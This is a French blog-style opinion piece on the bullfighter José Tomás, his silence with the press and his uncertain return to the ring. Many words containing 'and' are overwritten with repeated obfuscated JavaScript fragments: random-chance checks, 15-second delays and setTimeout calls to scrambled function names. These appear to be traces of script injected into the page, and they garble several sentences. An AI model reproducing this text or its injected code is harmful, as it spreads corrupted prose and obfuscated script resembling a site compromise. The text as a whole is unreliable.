LE MYSTERE DE JOSE TOMAS

José Tomás a toujours su vivre dans le mystère. En dehors de l’arène en habitant dans le monde nébuleux du silence, et dans l’arène, se plaçant de façon perenne dans ce que l’on n’attend pas et avec le sceau de ce qui est exceptionnel. Conjuguant ces deux facteurs; le mutisme de l’homme dans la rue et la prodigieuse éloquence du torero dans l’arène, le maestro de Galapagar est devenu, sans doute, l’homme le plus énigmatique de l’histoire de la Tauromachie.
Cependant, quandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and les circonstances actuelles ont obligé les figuras à promouvoir une information que les medias d’ (in) communication nient à la Fiesta si ce n’est pour la dénigrer; quandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and les premiers grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ands cartels quittent les bureaux pour devenir du domaine public sans que le nom de la Statue ne figure nulle part; quandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and du campo bravo nous arrivent des nouvelles des toros qu’il affronte, des vaches qu’il torée et de son entraînement permanent; quandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and  il n’existe que la certitude de la seule affiche où il est annoncé –le 3 mai à Juriquilla, avec son  compañero Fernandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando Ochoa, qui se coupera la coleta- et les rumeurs taurines racontent qu’il a réservé des corridas au campo pour de probables contrats, le silence du maestro devient pour certains impénétrable et inconvenant.
Ce dernier semble gêner certains journalistes, qui considèrent qu’il se prend pour un dieu et l’accusent de manque de respect vis-à-vis de la Fiesta et de ses propres partisans. Je ne partage pas ce point de vue. Tout au contraire: je n’ai jamais vu un torero aussi respectueux du rite et la liturgie du toreo ni aussi invesi par sa condition de figura. La liberté avec laquelle il se conduit dans le difficile maniement du silence est le fruit de ses conquêtes devant les toros, de la situation privilégiée qu’il a été capable d’acquérir, mais non pas de l’indifférence ou du mépris du toreo et des aficionados.
Lors de sa dernière saison, il n’avait révélé ses objectifs qu’à la mi-mai. Aujourd’hui, il peut en être pareil. Il est possible qu’en ce moment il ne sache pas lui-même quoi faire. N’oublions pas que c’est un torero arraché à la mort par le courage et la science d’un ange gardien devenu chirurgien. Le fait de se déplacer avec une ambulance du SAMU quandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and il va toréer au campo, d’exiger dans ses contrats qu’il y ait dans l’infirmerie des arènes des litres du sang qui lui correspond, son médecin personnel, etc., prouvent à l’évidence les risques que provoquerait une nouvelle blessure. Associer ce risque à son incorruptible sens des responsabilités n’est pas täche facile.  Etre à la hauteur de l’apothéose de Nîmes non plus. Peut-être voilà les clés du retard de sa decisión.

photos bruno Lasnier

002jtomas

jtomas01003jtomas

Les commentaires sont fermés.